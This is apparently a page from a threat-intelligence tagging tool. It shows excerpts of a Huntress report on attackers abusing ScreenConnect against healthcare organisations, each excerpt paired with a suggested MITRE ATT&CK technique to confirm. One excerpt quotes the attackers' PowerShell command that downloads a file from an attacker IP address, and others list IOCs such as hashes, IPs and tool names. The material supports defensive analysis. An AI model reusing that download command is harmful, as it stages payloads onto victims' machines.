“##connect instance c was used to run the following powershell command : powershell - command " $ wc = new - object system. net. webclient ; $ wc. downloadfile ( ' http : / / 119. 91. 138 [. ] 133 : 443 / test. xml ', ' c : \ programdata \ test. xml ' ) " almost 20 hours later, on…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1219Remote Access Tools
93%
“remote management of these clients to subsequent threat actor abuse. technical indicators of compromise ( iocs ) huntress has identified and urges immediate action upon the following iocs : associated files & payloads name sha256 function test. xml 9f42bf3a61faaab8f86abb3c7f9db41…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
80%
“to access the endpoint via screenconnect instance b. there were several pairs of “ connected ” and “ disconnected ” messages in the logs for the “ [ redacted 1 ] ” account until october 28, 2023. on october 28, the “ [ redacted 2 ] ” account was used to access screenconnect insta…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1046Network Service Discovery
75%
“##973be9892305132389c8588de ) : a legitimate winpcap version 4. 1. 3 executable. - masscan64. exe ( 174f91806e8bc1c0dea24192f7d4afcefc40a1731827b32939d4f411e8402d75 ) : a compiled version of the masscan tcp port scanner. - veeam. exe ( 45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1219Remote Access Tools
71%
“##er screenconnect instance ids screenconnect instance id description adf02e34cba839d2 screenconnect instance id b, associated with rs. tdsclinical [. ] com e3e2410d655306ff screenconnect instance id c, associated with 45. 66. 230 [. ] 146 4974c38508ef2b18 screenconnect instance …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
71%
“, the file s. msi was transferred to the endpoint via the screenconnect instance ; launching this file led to screenconnect instance d being installed on this endpoint, with the instance configured to connect to 185. 12. 45 [. ] 98 on port 8041. it was clear that screenconnect in…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1219Remote Access Tools
68%
“bitter pill | huntress in a concerning development within the healthcare sector, huntress has identified a series of unauthorized access that signifies internal reconnaissance and preparation for additional threat actor activity against multiple healthcare organizations. the atta…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
50%
“procedures ( ttps ) across both endpoints, as well as multiple intersections in indicators of compromise ( iocs ). specifically, one screenconnect instance ( instance b ) was observed being actively used on both endpoints, the “ [ redacted 1 ] ” account was observed being used to…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1574.001DLL
40%
“##servables while researching this event, huntress analysts identified an open directory on 2. 57. 149 [. ] 103, shown in the following figure : in addition to a. msi, the anydesk installer previously discussed, two additional files were located : - b. msi ( f28ee671c0f894154dd8c…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1219Remote Access Tools
36%
“procedures ( ttps ) across both endpoints, as well as multiple intersections in indicators of compromise ( iocs ). specifically, one screenconnect instance ( instance b ) was observed being actively used on both endpoints, the “ [ redacted 1 ] ” account was observed being used to…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1219Remote Access Tools
34%
“zip in monitored environments makes its association with the screenconnect incidents uncertain. however, the payloads in question match overall observed behaviors in terms of remote access tool installation ( b. msi ) and payloads associated with system survey ( masscan64. exe ) …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
33%
“zip in monitored environments makes its association with the screenconnect incidents uncertain. however, the payloads in question match overall observed behaviors in terms of remote access tool installation ( b. msi ) and payloads associated with system survey ( masscan64. exe ) …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Huntress has uncovered a series of unauthorized access, revealing a threat actor using ScreenConnect to infiltrate multiple healthcare organizations.